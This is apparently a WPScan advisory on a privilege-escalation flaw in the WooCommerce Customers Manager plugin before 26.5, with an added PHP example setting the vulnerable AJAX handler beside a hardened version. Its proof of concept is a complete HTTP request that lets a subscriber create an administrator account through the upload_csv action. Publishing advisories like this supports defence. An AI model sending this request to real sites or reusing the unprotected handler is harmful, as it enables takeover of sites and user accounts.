WordPress Plugin Vulnerabilities

Woocommerce Customers Manager < 26.5 - Arbitrary Account Creation/Update by Low Privilege Users

Description

The upload_csv AJAX action, available to any authenticated user, did not have proper capability checks, allowing low-privilege users such as subscribers to call it and import arbitrary users from a CSV. They could either update their own account to make themselves administrator, or create new administrator accounts.

Note (WPScanTeam): Even though a capability check has been added in v26.5, there is still no CSRF protection, which could allow an attacker to perform the same attack by tricking a logged-in user with the manage_woocommerce capability into opening a malicious link/page. A separate issue has been created for it.
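
To make the two missing controls concrete, here is an added example (written for this page, not code from the WooCommerce Customers Manager plugin) that reconstructs the vulnerable pattern described above next to a hardened handler. The hook name wp_ajax_upload_csv follows from the PoC's action parameter; the nonce action 'wccm_upload_csv', the example_* function names and the CSV import helper are assumptions. The hardened version also goes one step beyond the fix the advisory describes: it restricts imported roles to those the caller is allowed to assign, so that even a legitimate manage_woocommerce user cannot create administrators through the import.

```php
<?php
/**
 * Added example, not the plugin's code: the vulnerable pattern described in
 * the advisory (an authenticated AJAX action with no capability or nonce
 * check) beside a hardened handler. The nonce action 'wccm_upload_csv' and
 * the example_* names are assumptions.
 */

// --- Vulnerable pattern (pre-26.5 behaviour, left unhooked here on purpose).
// add_action( 'wp_ajax_upload_csv', 'example_upload_csv_vulnerable' );
function example_upload_csv_vulnerable() {
    // wp_ajax_* actions are reachable by every logged-in user. Without
    // current_user_can() and check_ajax_referer(), a subscriber can submit a
    // CSV that creates or updates users with any role, including administrator.
    $result = example_import_users_from_csv( wp_unslash( $_POST['csv'] ?? '' ), null );
    wp_send_json_success( $result );
}

// --- Hardened handler.
add_action( 'wp_ajax_upload_csv', 'example_upload_csv_hardened' );
function example_upload_csv_hardened() {
    // 1. CSRF: the request must carry a nonce issued to this user for this
    //    action (client side: wp_create_nonce( 'wccm_upload_csv' )). Aborts
    //    the request when the nonce is missing or invalid.
    check_ajax_referer( 'wccm_upload_csv', 'nonce' );

    // 2. Authorization: the caller must actually be allowed to manage customers.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 3. Privilege containment: only roles the caller may assign to others.
    //    get_editable_roles() lives in wp-admin/includes/user.php, which
    //    admin-ajax.php loads, and honours the editable_roles filter.
    $allowed_roles = array_keys( get_editable_roles() );

    $result = example_import_users_from_csv( wp_unslash( $_POST['csv'] ?? '' ), $allowed_roles );
    wp_send_json_success( $result );
}

/**
 * Import rows of the form "ID","Password","Role","Login","Email" (the column
 * set used in the PoC). Rows whose role is not in $allowed_roles are skipped;
 * null means no restriction and exists only to model the vulnerable behaviour.
 */
function example_import_users_from_csv( $csv, $allowed_roles ) {
    $lines  = preg_split( '/\r\n|\r|\n/', trim( $csv ) );
    $header = array_map( 'strtolower', str_getcsv( array_shift( $lines ) ) );
    $created = $updated = $rejected = 0;

    foreach ( $lines as $line ) {
        if ( '' === trim( $line ) ) {
            continue;
        }
        $values = str_getcsv( $line );
        if ( count( $values ) !== count( $header ) ) {
            $rejected++;
            continue;
        }
        $row  = array_combine( $header, $values );
        $role = sanitize_key( $row['role'] ?? '' );

        if ( null !== $allowed_roles && ! in_array( $role, $allowed_roles, true ) ) {
            $rejected++; // e.g. "administrator" submitted by a shop manager
            continue;
        }

        $userdata = array(
            'user_login' => sanitize_user( $row['login'] ?? '' ),
            'user_email' => sanitize_email( $row['email'] ?? '' ),
            'role'       => $role,
        );
        if ( '' !== ( $row['password'] ?? '' ) ) {
            $userdata['user_pass'] = $row['password'];
        }

        if ( ! empty( $row['id'] ) ) {
            // Existing account: this is the self-update path an attacker used
            // to turn their own subscriber account into an administrator.
            $userdata['ID'] = (int) $row['id'];
            $id = wp_update_user( $userdata );
            is_wp_error( $id ) ? $rejected++ : $updated++;
        } else {
            $id = wp_insert_user( $userdata );
            is_wp_error( $id ) ? $rejected++ : $created++;
        }
    }
    return compact( 'created', 'updated', 'rejected' );
}
```

The capability check alone only closes the subscriber path; the nonce is what closes the CSRF vector in the note above, since a forged cross-site form cannot supply a nonce bound to the victim's session. The role allowlist is an additional containment step not described by the advisory: it keeps the import from being a route to administrator for anyone who does not already have that power through the normal user screens.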

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------11119326056266279563140446786
Content-Length: 683
Connection: close
Cookie: [low role account, such as subscriber]

-----------------------------11119326056266279563140446786
Content-Disposition: form-data; name="action"

upload_csv
-----------------------------11119326056266279563140446786
Content-Disposition: form-data; name="send-notification-email"

no
-----------------------------11119326056266279563140446786
Content-Disposition: form-data; name="csv"

"ID","Password","Role","Login","Email"<#>"","Passw0rd","administrator","admin-attacker","admin-attacker@localhost.org"
-----------------------------11119326056266279563140446786--

Miscellaneous

Original Researcher
John Castro (Pagely.com)
Verified
Yes

Timeline

Publicly Published
2021-02-24
Added
2021-03-30
Last Updated
2021-04-09